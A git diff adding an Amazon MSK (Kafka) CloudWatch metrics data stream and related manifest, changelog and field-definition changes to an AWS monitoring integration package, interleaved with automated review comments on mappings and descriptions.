+of incoming messages and more. See more details in the [Metrics reference](#metrics-reference)
+
+## Requirements
+
+You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it.
+You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware.
+
+Before using any AWS integration you will need:
+
+* **AWS Credentials** to connect with your AWS account.
+* **AWS Permissions** to make sure the user you're using to connect has permission to share the relevant data.
+
+For more details about these requirements, see the **AWS** integration documentation.
+
+## Setup
+
+Use this integration if you only need to collect data from the Amazon MSK service.
+
+If you want to collect data from two or more AWS services, consider using the **AWS** integration.
+When you configure the AWS integration, you can collect data from as many AWS services as you'd like.
+
+For step-by-step instructions on how to set up an integration, see the
+{{ url "getting-started-observability" "Getting started" }} guide.
+
+## Metrics reference
+
+{{event "kafka_metrics"}}
+
+{{fields "kafka_metrics"}}
diff --git a/packages/aws/changelog.yml b/packages/aws/changelog.yml
index 2587c41c6ef..96e86031f05 100644
--- a/packages/aws/changelog.yml
+++ b/packages/aws/changelog.yml
@@ -1,4 +1,39 @@
# newer versions go on top
+- version: "2.14.1"
+ changes:
+ - description: Document billing data stream limitations.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9290
+- version: "2.14.0"
+ changes:
+ - description: Add ability to set processors and leader election on AWS Billing.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/8414
+- version: "2.13.1"
+ changes:
+ - description: Update latency parameter description
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9346
+- version: "2.13.0"
+ changes:
+ - description: Add Amazon MSK integration
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9133
+- version: "2.12.2"
+ changes:
+ - description: Fix an issue were the "_id" field was being used to aggregate data in Severity Over Time dashboard.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9253
+- version: "2.12.1"
+ changes:
+ - description: Add cloudsecurity_cdr sub category label.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9213
+- version: "2.12.0"
+ changes:
+ - description: Enable 'secret' for the sensitive fields.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9009
- version: "2.11.3"
changes:
- description: Fix query range calculation for GuardDuty datastream.
@@ -1172,7 +1207,7 @@
- description: Convert to generated ECS fields
type: enhancement
link: https://github.com/elastic/integrations/pull/1465
-- version: '0.10.2'
+- version: "0.10.2"
changes:
- description: update to ECS 1.11.0
type: enhancement
diff --git a/packages/aws/data_stream/apigateway_metrics/manifest.yml b/packages/aws/data_stream/apigateway_metrics/manifest.yml
index 9fad056decc..a3ded65eaa3 100644
--- a/packages/aws/data_stream/apigateway_metrics/manifest.yml
+++ b/packages/aws/data_stream/apigateway_metrics/manifest.yml
@@ -25,7 +25,7 @@ streams:
required: false
show_user: true
- name: latency
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `5m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
type: text
title: Latency
multi: false
diff --git a/packages/aws/data_stream/billing/agent/stream/stream.yml.hbs b/packages/aws/data_stream/billing/agent/stream/stream.yml.hbs
index ff0998752c9..fbbfd6733a7 100644
--- a/packages/aws/data_stream/billing/agent/stream/stream.yml.hbs
+++ b/packages/aws/data_stream/billing/agent/stream/stream.yml.hbs
@@ -44,4 +44,11 @@ cost_explorer_config.group_by_tag_keys:
{{/if}}
{{#if proxy_url }}
proxy_url: {{proxy_url}}
-{{/if}}
\ No newline at end of file
+{{/if}}
+{{#if leaderelection}}
+condition: ${kubernetes_leaderelection.leader} == true
+{{/if}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
diff --git a/packages/aws/data_stream/billing/manifest.yml b/packages/aws/data_stream/billing/manifest.yml
index f63ab40987c..3fda2894036 100644
--- a/packages/aws/data_stream/billing/manifest.yml
+++ b/packages/aws/data_stream/billing/manifest.yml
@@ -49,5 +49,22 @@ streams:
show_user: false
default: true
description: When include_linked_accounts is set to true, CloudWatch metrics will be collected from both linked accounts and the monitoring account. Default is true.
+ - name: leaderelection
+ type: bool
+ title: Leader Election
+ multi: false
+ required: true
+ show_user: false
+ default: false
+ description: >
+ Enable leaderelection between a set of Elastic Agents running on Kubernetes.
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the events are shipped. See [Processors](https://www.elastic.co/guide/en/fleet/current/elastic-agent-processor-configuration.html) for details.
title: AWS Billing Metrics
description: Collect billing metrics from Amazon Web Services with Elastic Agent.
diff --git a/packages/aws/data_stream/cloudtrail/manifest.yml b/packages/aws/data_stream/cloudtrail/manifest.yml
index 132031cfece..ca548f11d96 100644
--- a/packages/aws/data_stream/cloudtrail/manifest.yml
+++ b/packages/aws/data_stream/cloudtrail/manifest.yml
@@ -160,11 +160,13 @@ streams:
- name: password
type: password
title: Splunk REST API Password
+ secret: true
required: false
show_user: true
- name: token
type: password
title: Splunk Authorization Token
+ secret: true
description: |
Bearer Token or Session Key, e.g. "Bearer eyJFd3e46..." or "Splunk 192fd3e...".
Cannot be used with username
diff --git a/packages/aws/data_stream/ebs/manifest.yml b/packages/aws/data_stream/ebs/manifest.yml
index ddc6369b0f6..d738b843814 100644
--- a/packages/aws/data_stream/ebs/manifest.yml
+++ b/packages/aws/data_stream/ebs/manifest.yml
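Review bot: The `leaderelection` description `Enable leaderelection between a set of Elastic Agents running on Kubernetes.` names the switch but not its effect; the stream template in this same commit gates the input on `condition: ${kubernetes_leaderelection.leader} == true`, so in practice only the agent elected as leader collects billing data. Suggest: `When enabled, only the Elastic Agent elected as leader among the agents running on Kubernetes collects billing metrics, which avoids duplicate events when the integration is deployed to every node. Has no effect outside Kubernetes.` `required: true` with `default: false` and `show_user: false` is fine for an opt-in flag.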
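Review bot: `secret: true` on the Splunk `password` and `token` variables is only honoured by Fleet from 8.12 onward, and the package-level `conditions.kibana.version` that would guarantee that is not in this diff; the aws `2.12.0` changelog entry "Enable 'secret' for the sensitive fields" suggests the constraint was already raised, but confirm it is `^8.12.0` or higher before relying on it. Otherwise the hunk matches the other `secret: true` changes in this commit: both variables keep `type: password` and `required: false`.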
@@ -30,7 +30,7 @@ streams:
multi: false
required: false
show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
- name: tags_filter
type: yaml
title: Tags Filter
diff --git a/packages/aws/data_stream/ec2_metrics/_dev/deploy/tf/.terraform.lock.hcl b/packages/aws/data_stream/ec2_metrics/_dev/deploy/tf/.terraform.lock.hcl
index d8769bd6de8..d1947fa596b 100644
--- a/packages/aws/data_stream/ec2_metrics/_dev/deploy/tf/.terraform.lock.hcl
+++ b/packages/aws/data_stream/ec2_metrics/_dev/deploy/tf/.terraform.lock.hcl
@@ -2,19 +2,23 @@
 # Manual edits may be lost in future updates.
 provider "registry.terraform.io/hashicorp/aws" {
- version = "4.0.0"
+ version = "5.39.1"
 hashes = [
- "h1:G0toIzBkhRr/UNRdksvnIyPXnGT9nH0A7gWmu93I1Eg=",
- "zh:02937cb37860b022e7d996726e7584ca23904baf7852d266f2dd7891ee088ae4",
- "zh:259dd5790ec5f4e6814c9584c79834dce3d719e932ce662b21f13434e9441194",
- "zh:2d230c8c92c3cb2c07471a4324d802c44365dcf99fe0d562cc737d1f964e9c1d",
- "zh:380b04e78934519469e699c537516ae1674d15f77c6778c2738cd69374b661aa",
- "zh:3d7121da1fa92166c9ea26f3c9839cef06833420d6c46978b4cbbfd0b5050791",
- "zh:6b7f5a3b28ec3a631d689f599a39bfe98ca5b785353b01e374cff655b097a791",
- "zh:7882291716d2d03df5ece721429770452db76c712fcff08964c3a7c0b639f703",
- "zh:95250c5768610d69a28501f03176b6a05a5d5ac2ae317cb582d94b044b3272b3",
- "zh:b16a622a76bee455c8b256d828f8a60515e1e9dad38420a4db1be9b9e16d474a",
- "zh:c805822f0ba57e8063b6201e1f351aa4dbd5ad8886dedd25d809e5aeb9aa0259",
- "zh:e1c3a0da5576aec4a48f897cd04b739c1f533cdb0005ce4c7f5bc45808b799b1",
+ "h1:hQLlAd6O1LdQHy1GdWtgT5fcOlc3TWW+SaaFkpe+e8E=",
+ "zh:05c50a5d8edb3ba4ebc4eb6e0d0b5e319142f5983b27821710ed7d475d335bdc",
+ "zh:082986a5784dd21957e632371b289e549f051a4ea21d5c78c6d744c3537f03c5",
+ "zh:192ae622ba562eacc4921ed549a794506179233d724fdd15a4f147f3400724a0",
+ "zh:19a1d4637a62de90b0da174c0bf01000cd900488f7e8f709d8a37f082c59756b",
+ "zh:1d7689a8583515f1705972d7ce57ccfab96215b19905530d2c78c02dcfaff583",
+ "zh:22c446a21209a52ab74b4ba1ede0b220531e97ce479430047e493a2c45e1d8cb",
+ "zh:4154de82290ab4e9f81bac1ea62342de8b3b7a608f99258c190d4dd1c6663e47",
+ "zh:6bc4859ccdc54f28af9286b2fa090a31dcb345138d68c471510b737f6a052011",
+ "zh:73c69e000e0b321e78a4a12fef60d37285f2afec0ea7be9e06163d985101cb59",
+ "zh:890a3422f5e445b49bae30facf448d0ec9cd647e9155d0b685b5b39e9d331a94",
+ "zh:9b12af85486a96aedd8d7984b0ff811a4b42e3d88dad1a3fb4c0b580d04fa425",
+ "zh:9cd88bec0f5205df9032e3126d4e57edd1c5cc8d45cda25626882dafc485a3b0",
+ "zh:a3a8e3276d0fbf051bbafa192a2998b05745f2cf285ac8c36a9ad167a75c037f",
+ "zh:d47e4dcf4c0ad71b9a7c720be4f3a89f6786a82e77bbe8d950794562792a1da5",
+ "zh:f74e5b2af508c7de80a6ae5198df54a795eeba5058a0cd247828943f0c54f6e0",
 ]
 }
diff --git a/packages/aws/data_stream/ec2_metrics/manifest.yml b/packages/aws/data_stream/ec2_metrics/manifest.yml
index 59ceddadaf0..8a15fd55b2d 100644
--- a/packages/aws/data_stream/ec2_metrics/manifest.yml
+++ b/packages/aws/data_stream/ec2_metrics/manifest.yml
@@ -30,7 +30,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: tags_filter
 type: yaml
 title: Tags Filter
diff --git a/packages/aws/data_stream/ecs_metrics/manifest.yml b/packages/aws/data_stream/ecs_metrics/manifest.yml
index 73306c0da3e..837fa3d6fb4 100644
--- a/packages/aws/data_stream/ecs_metrics/manifest.yml
+++ b/packages/aws/data_stream/ecs_metrics/manifest.yml
@@ -30,7 +30,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: tags_filter
 type: yaml
 title: Tags Filter
diff --git a/packages/aws/data_stream/elb_metrics/manifest.yml b/packages/aws/data_stream/elb_metrics/manifest.yml
index 5b1c38bb754..48bce706a5d 100644
--- a/packages/aws/data_stream/elb_metrics/manifest.yml
+++ b/packages/aws/data_stream/elb_metrics/manifest.yml
@@ -30,7 +30,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: tags_filter
 type: yaml
 title: Tags Filter
diff --git a/packages/aws/data_stream/emr_metrics/manifest.yml b/packages/aws/data_stream/emr_metrics/manifest.yml
index c16c0819354..373787bc6a6 100644
--- a/packages/aws/data_stream/emr_metrics/manifest.yml
+++ b/packages/aws/data_stream/emr_metrics/manifest.yml
@@ -31,7 +31,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: include_linked_accounts
 type: bool
 title: Include Linked Accounts
diff --git a/packages/aws/data_stream/firewall_metrics/manifest.yml b/packages/aws/data_stream/firewall_metrics/manifest.yml
index 417522f087a..672815ad860 100644
--- a/packages/aws/data_stream/firewall_metrics/manifest.yml
+++ b/packages/aws/data_stream/firewall_metrics/manifest.yml
@@ -30,7 +30,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: include_linked_accounts
 type: bool
 title: Include Linked Accounts
diff --git a/packages/aws/data_stream/kafka_metrics/agent/stream/stream.yml.hbs b/packages/aws/data_stream/kafka_metrics/agent/stream/stream.yml.hbs
new file mode 100644
index 00000000000..395ce09518d
--- /dev/null
+++ b/packages/aws/data_stream/kafka_metrics/agent/stream/stream.yml.hbs
@@ -0,0 +1,99 @@
+metricsets: ["cloudwatch"]
+period: {{period}}
+{{#if data_granularity}}
+data_granularity: {{data_granularity}}
+{{/if}}
+{{#if include_linked_accounts}}
+include_linked_accounts: {{include_linked_accounts}}
+{{/if}}
+{{#if access_key_id}}
+access_key_id: {{access_key_id}}
+{{/if}}
+{{#if secret_access_key}}
+secret_access_key: {{secret_access_key}}
+{{/if}}
+{{#if session_token}}
+session_token: {{session_token}}
+{{/if}}
+{{#if credential_profile_name}}
+credential_profile_name: {{credential_profile_name}}
+{{/if}}
+{{#if shared_credential_file}}
+shared_credential_file: {{shared_credential_file}}
+{{/if}}
+{{#if role_arn}}
+role_arn: {{role_arn}}
+{{/if}}
+{{#if default_region}}
+default_region: {{default_region}}
+{{/if}}
+{{#if regions}}
+regions:
+{{#each regions as |region i|}}
+- {{region}}
+{{/each}}
+{{/if}}
+{{#if latency}}
+latency: {{latency}}
+{{/if}}
+{{#if tags_filter}}
+tags_filter: {{tags_filter}}
+{{/if}}
+{{#if proxy_url }}
+proxy_url: {{proxy_url}}
+{{/if}}
+metrics:
+- namespace: AWS/Kafka
+ resource_type: kafka
+ statistic: ["Sum"]
+ name:
+ - ActiveControllerCount
+ - BytesInPerSec
+ - BytesOutPerSec
+ - ClientConnectionCount
+ - ConnectionCount
+ - EstimatedMaxTimeLag
+ - FetchMessageConversionsPerSec
+ - GlobalPartitionCount
+ - GlobalTopicCount
+ - LeaderCount
+ - MessagesInPerSec
+ - NetworkRxDropped
+ - NetworkRxErrors
+ - NetworkRxPackets
+ - NetworkTxDropped
+ - NetworkTxErrors
+ - NetworkTxPackets
+ - MaxOffsetLag
+ - ProduceMessageConversionsPerSec
+ - SumOffsetLag
+- namespace: AWS/Kafka
+ resource_type: kafka
+ statistic: ["Average"]
+ name:
+ - BurstBalance
+ - CPUCreditBalance
+ - CpuIdle
+ - CpuIoWait
+ - CpuSystem
+ - CpuUser
+ - KafkaAppLogsDiskUsed
+ - KafkaDataLogsDiskUsed
+ - LeaderCount
+ - MemoryBuffered
+ - MemoryCached
+ - MemoryFree
+ - HeapMemoryAfterGC
+ - MemoryUsed
+ - OfflinePartitionsCount
+ - PartitionCount
+ - ProduceTotalTimeMsMean
+ - RequestBytesMean
+ - RequestTime
+ - RootDiskUsed
+ - SwapFree
+ - SwapUsed
+ - TrafficShaping
+ - UnderMinIsrPartitionCount
+ - UnderReplicatedPartitions
+ - ZooKeeperRequestLatencyMsMean
diff --git a/packages/aws/data_stream/kafka_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/aws/data_stream/kafka_metrics/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..c44b20cf81a
--- /dev/null
+++ b/packages/aws/data_stream/kafka_metrics/elasticsearch/ingest_pipeline/default.yml
@@ -0,0 +1,20 @@
+---
+description: "Pipeline for Amazon MSK metrics"
+
+processors:
+ - rename:
+ field: aws.dimensions.Cluster Name
+ target_field: aws.dimensions.ClusterName
+ ignore_missing: true
+ - rename:
+ field: aws.dimensions.Consumer Group
+ target_field: aws.dimensions.ConsumerGroup
+ ignore_missing: true
+ - rename:
+ field: aws.dimensions.Broker ID
+ target_field: aws.dimensions.BrokerID
+ ignore_missing: true
+ - rename:
+ field: aws.dimensions.Client Authentication
+ target_field: aws.dimensions.ClientAuthentication
+ ignore_missing: true
diff --git a/packages/aws/data_stream/kafka_metrics/fields/agent.yml b/packages/aws/data_stream/kafka_metrics/fields/agent.yml
new file mode 100644
index 00000000000..13e13903cc4
--- /dev/null
+++ b/packages/aws/data_stream/kafka_metrics/fields/agent.yml
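Review bot: `LeaderCount` is requested under both the `["Sum"]` and the `["Average"]` statistic blocks, but `fields/fields.yml` in this same diff declares only `LeaderCount.sum`, so the `LeaderCount.avg` value produced by the second block has no declared mapping and will be mapped dynamically instead of as the intended metric; either drop the `- LeaderCount` line from the `["Average"]` block or add a `LeaderCount.avg` field definition. Two style points in the same hunk: `{{#each regions as |region i|}}` binds an index `i` that is never used, and `{{#if proxy_url }}` carries a stray space that none of the other conditionals have.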
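Review bot: The pipeline has no `on_failure` handler, so any processor error rejects the document with nothing recorded in the index; `rename` still fails when the target field already exists, even with `ignore_missing: true`. `fields/ecs.yml` in this diff already declares `error.message`, which is presumably where this package's other pipelines record such failures (inferred from the field being declared; confirm against a sibling data stream). Appending a trailing handler keeps the event and makes the failure visible in search:
```yaml
# … unchanged: rename processors …
on_failure:
  - set:
      field: error.message
      value: '{{{ _ingest.on_failure_message }}}'
```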
@@ -0,0 +1,35 @@
+- name: cloud
+ title: Cloud
+ group: 2
+ description: Fields related to the cloud or infrastructure the events are coming from.
+ footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.'
+ type: group
+ fields:
+ - name: image.id
+ type: keyword
+ description: Image ID for the cloud instance.
+- name: host
+ title: Host
+ group: 2
+ description: 'A host is defined as a general computing instance.
+
+ ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.'
+ type: group
+ fields:
+ - name: containerized
+ type: boolean
+ description: >
+ If the host is a container.
+
+ - name: os.build
+ type: keyword
+ example: "18D109"
+ description: >
+ OS build information.
+
+ - name: os.codename
+ type: keyword
+ example: "stretch"
+ description: >
+ OS codename, if any.
+
diff --git a/packages/aws/data_stream/kafka_metrics/fields/base-fields.yml b/packages/aws/data_stream/kafka_metrics/fields/base-fields.yml
new file mode 100644
index 00000000000..2b34ac77b17
--- /dev/null
+++ b/packages/aws/data_stream/kafka_metrics/fields/base-fields.yml
@@ -0,0 +1,16 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
+- name: event.module
+ type: constant_keyword
+ description: Event module
+ value: aws
diff --git a/packages/aws/data_stream/kafka_metrics/fields/ecs.yml b/packages/aws/data_stream/kafka_metrics/fields/ecs.yml
new file mode 100644
index 00000000000..654c9b2e202
--- /dev/null
+++ b/packages/aws/data_stream/kafka_metrics/fields/ecs.yml
@@ -0,0 +1,70 @@
+- external: ecs
+ name: cloud
+- external: ecs
+ name: cloud.account.id
+ dimension: true
+- external: ecs
+ name: cloud.account.name
+- external: ecs
+ name: cloud.availability_zone
+- external: ecs
+ name: cloud.instance.id
+- external: ecs
+ name: cloud.machine.type
+- external: ecs
+ name: cloud.provider
+- external: ecs
+ name: cloud.region
+ dimension: true
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: error
+- external: ecs
+ name: error.message
+- external: ecs
+ name: service.type
+- external: ecs
+ name: host.architecture
+- external: ecs
+ name: host.domain
+- external: ecs
+ name: host.hostname
+- external: ecs
+ name: host.id
+- external: ecs
+ name: host.ip
+- external: ecs
+ name: host.mac
+- external: ecs
+ name: host.name
+- external: ecs
+ name: host.os.family
+- external: ecs
+ name: host.os.kernel
+- external: ecs
+ name: host.os.name
+- external: ecs
+ name: host.os.platform
+- external: ecs
+ name: host.os.version
+- external: ecs
+ name: host.type
+- external: ecs
+ name: cloud.instance.name
+- external: ecs
+ name: cloud.project.id
+- external: ecs
+ name: container.id
+- external: ecs
+ name: container.image.name
+- external: ecs
+ name: container.labels
+- external: ecs
+ name: container.name
+- name: agent.id
+ external: ecs
+ dimension: true
+- external: ecs
+ name: event.dataset
+ type: constant_keyword
diff --git a/packages/aws/data_stream/kafka_metrics/fields/fields.yml b/packages/aws/data_stream/kafka_metrics/fields/fields.yml
new file mode 100644
index 00000000000..3e8b9544c37
--- /dev/null
+++ b/packages/aws/data_stream/kafka_metrics/fields/fields.yml
@@ -0,0 +1,218 @@
+- name: aws
+ type: group
+ fields:
+ - name: kafka
+ type: group
+ fields:
+ - name: metrics
+ type: group
+ fields:
+ - name: ActiveControllerCount.sum
+ type: long
+ metric_type: gauge
+ description: The total number of active controllers. Only one controller per cluster should be active at any given time.
+ - name: BurstBalance.avg
+ type: long
+ metric_type: gauge
+ description: The average remaining balance of input-output burst credits for EBS volumes in the cluster.
+ - name: BytesInPerSec.sum
+ type: long
+ metric_type: gauge
+ description: The total number of bytes per second received from clients in the given collection period.
+ - name: BytesOutPerSec.sum
+ type: long
+ metric_type: gauge
+ description: The total number of bytes per second sent to clients in the given collection period.
+ - name: ClientConnectionCount.sum
+ type: long
+ metric_type: gauge
+ description: The total number of active authenticated client connections.
+ - name: ConnectionCount.sum
+ type: long
+ metric_type: gauge
+ description: The total number of active authenticated, unauthenticated, and inter-broker connections.
+ - name: CPUCreditBalance.avg
+ type: long
+ metric_type: gauge
+ description: The average number of earned CPU credits that a broker has accrued since it was launched.
+ - name: CpuIdle.avg
+ type: long
+ metric_type: gauge
+ description: The average percentage of CPU idle time.
+ - name: CpuIoWait.avg
+ type: long
+ metric_type: gauge
+ description: The average percentage of CPU idle time during a pending disk operation.
+ - name: CpuSystem.avg
+ type: long
+ metric_type: gauge
+ description: The average percentage of CPU in kernel space.
+ - name: CpuUser.avg
+ type: long
+ metric_type: gauge
+ description: The average percentage of CPU in user space.
+ - name: GlobalPartitionCount.sum
+ type: long
+ metric_type: gauge
+ description: The total number of partitions across all topics in the cluster, excluding replicas.
+ - name: GlobalTopicCount.sum
+ type: long
+ metric_type: gauge
+ description: The total number of topics across all brokers in the cluster.
+ - name: EstimatedMaxTimeLag.sum
+ type: long
+ metric_type: gauge
+ description: The total time estimate (in seconds) to drain MaxOffsetLag in the given collection period.
+ - name: FetchMessageConversionsPerSec.sum
+ type: long
+ metric_type: gauge
+ description: The total number of fetch message conversions per second for the topic in the given collection period.
+ - name: KafkaAppLogsDiskUsed.avg
+ type: long
+ metric_type: gauge
+ description: The average percentage of disk space used for application logs.
+ - name: KafkaDataLogsDiskUsed.avg
+ type: long
+ metric_type: gauge
+ description: The average percentage of disk space used for data logs.
+ - name: LeaderCount.sum
+ type: long
+ metric_type: gauge
+ description: The total number of leaders of partitions per broker, not including replicas.
+ - name: MaxOffsetLag.sum
+ type: long
+ metric_type: gauge
+ description: The total maximum offset lag across all partitions in a topic in the given collection period.
+ - name: MemoryBuffered.avg
+ type: long
+ metric_type: gauge
+ description: The average size in bytes of buffered memory for the broker.
+ - name: MemoryCached.avg
+ type: long
+ metric_type: gauge
+ description: The average size in bytes of cached memory for the broker.
+ - name: MemoryFree.avg
+ type: long
+ metric_type: gauge
+ description: The average size in bytes of memory that is free and available for the broker.
+ - name: HeapMemoryAfterGC.avg
+ type: long
+ metric_type: gauge
+ description: The average percentage of total heap memory in use after garbage collection.
+ - name: MemoryUsed.avg
+ type: long
+ metric_type: gauge
+ description: The average size in bytes of memory that is in use for the broker.
+ - name: MessagesInPerSec.sum
+ type: long
+ metric_type: gauge
+ description: The total number of incoming messages per second for the broker in the given collection period.
+ - name: NetworkRxDropped.sum
+ type: long
+ metric_type: counter
+ description: The total number of dropped receive packages.
+ - name: NetworkRxErrors.sum
+ type: long
+ metric_type: counter
+ description: The total number of network receive errors for the broker.
+ - name: NetworkRxPackets.sum
+ type: long
+ metric_type: counter
+ description: The total number of packets received by the broker.
+ - name: NetworkTxDropped.sum
+ type: long
+ metric_type: counter
+ description: The total number of dropped transmit packages.
+ - name: NetworkTxErrors.sum
+ type: long
+ metric_type: counter
+ description: The total number of network transmit errors for the broker.
+ - name: NetworkTxPackets.sum
+ type: long
+ metric_type: counter
+ description: The total number of packets transmitted by the broker.
+ - name: OfflinePartitionsCount.avg
+ type: long
+ metric_type: gauge
+ description: The average number of partitions that are offline in the cluster.
+ - name: PartitionCount.avg
+ type: long
+ metric_type: gauge
+ description: The average number of topic partitions per broker, including replicas.
+ - name: ProduceMessageConversionsPerSec.sum
+ type: long
+ metric_type: gauge
+ description: The total number of produce message conversions per second for the topic in the given collection period.
+ - name: ProduceTotalTimeMsMean.avg
+ type: long
+ metric_type: gauge
+ description: The mean produce time in milliseconds.
+ - name: RequestBytesMean.avg
+ type: long
+ metric_type: gauge
+ description: The mean number of request bytes for the broker.
+ - name: RequestTime.avg
+ type: long
+ metric_type: gauge
+ description: The average time in milliseconds spent in broker network and I/O threads to process requests.
+ - name: RootDiskUsed.avg
+ type: long
+ metric_type: gauge
+ description: The average percentage of the root disk used by the broker.
+ - name: SumOffsetLag.sum
+ type: long
+ metric_type: gauge
+ description: The total aggregated offset lag for all the partitions in a topic.
+ - name: SwapFree.avg
+ type: long
+ metric_type: gauge
+ description: The average size in bytes of swap memory that is available for the broker.
+ - name: SwapUsed.avg
+ type: long
+ metric_type: gauge
+ description: The size in bytes of swap memory that is in use for the broker.
+ - name: TrafficShaping.avg
+ type: long
+ metric_type: gauge
+ description: The average number of packets shaped (dropped or queued) due to exceeding network allocations.
+ - name: UnderMinIsrPartitionCount.avg
+ type: long
+ metric_type: gauge
+ description: The average number of under minIsr partitions for the broker.
+ - name: UnderReplicatedPartitions.avg
+ type: long
+ metric_type: gauge
+ description: The average number of under-replicated partitions for the broker.
+ - name: ZooKeeperRequestLatencyMsMean.avg
+ type: long
+ metric_type: gauge
+ description: The mean latency in milliseconds for Apache ZooKeeper requests from broker.
+ - name: dimensions
+ type: group
+ fields:
+ - name: ClusterName
+ type: keyword
+ dimension: true
+ description: Filters the metric data by cluster name.
+ - name: BrokerID
+ dimension: true
+ type: keyword
+ description: Filters the metric data by broker ID.
+ - name: ConsumerGroup
+ type: keyword
+ dimension: true
+ description: Filters the metric data by consumer group.
+ - name: Topic
+ dimension: true
+ type: keyword
+ description: Filters the metric data by topic.
+ - name: ClientAuthentication
+ dimension: true
+ type: keyword
+ description: Filters the metric data by client authentication.
+ - name: cloudwatch
+ type: group
+ fields:
+ - name: namespace
+ type: keyword
+ description: The namespace specified when query cloudwatch api.
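Review bot: The six `NetworkRx*`/`NetworkTx*` `.sum` fields are the only ones declared `metric_type: counter`; they are collected with the `Sum` statistic per collection period (see the stream template in this diff), which yields a per-period total rather than a monotonically increasing value, so `counter` does not appear to match the data and `gauge`, as used for every other `.sum` field here, is the safer choice. Separately, every `.avg` field is `type: long`, so fractional CloudWatch averages such as `CpuIdle.avg` or `KafkaDataLogsDiskUsed.avg` (percentages) are truncated at index time; `type: double` preserves them. Two wording nits: `SwapUsed.avg` is described as `The size in bytes of swap memory…` where its siblings say `The average size…`, and the `cloudwatch.namespace` description reads `when query cloudwatch api` (`when querying the CloudWatch API`).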
diff --git a/packages/aws/data_stream/kafka_metrics/fields/package-fields.yml b/packages/aws/data_stream/kafka_metrics/fields/package-fields.yml
new file mode 100644
index 00000000000..4df416cc3fd
--- /dev/null
+++ b/packages/aws/data_stream/kafka_metrics/fields/package-fields.yml
@@ -0,0 +1,7 @@
+- name: aws
+ type: group
+ fields:
+ - name: tags
+ type: flattened
+ description: |
+ Tag key value pairs from aws resources.
diff --git a/packages/aws/data_stream/kafka_metrics/manifest.yml b/packages/aws/data_stream/kafka_metrics/manifest.yml
new file mode 100644
index 00000000000..0f039c45eb0
--- /dev/null
+++ b/packages/aws/data_stream/kafka_metrics/manifest.yml
@@ -0,0 +1,52 @@
+title: AWS Kafka metrics
+type: metrics
+elasticsearch:
+ index_mode: "time_series"
+streams:
+ - input: aws/metrics
+ vars:
+ - name: period
+ type: text
+ title: Collection Period
+ multi: false
+ required: true
+ show_user: true
+ default: 1m
+ - name: data_granularity
+ type: text
+ title: Data Granularity
+ multi: false
+ required: false
+ show_user: false
+ - name: regions
+ type: text
+ title: Regions
+ multi: true
+ required: false
+ show_user: true
+ - name: latency
+ type: text
+ title: Latency
+ multi: false
+ required: false
+ show_user: false
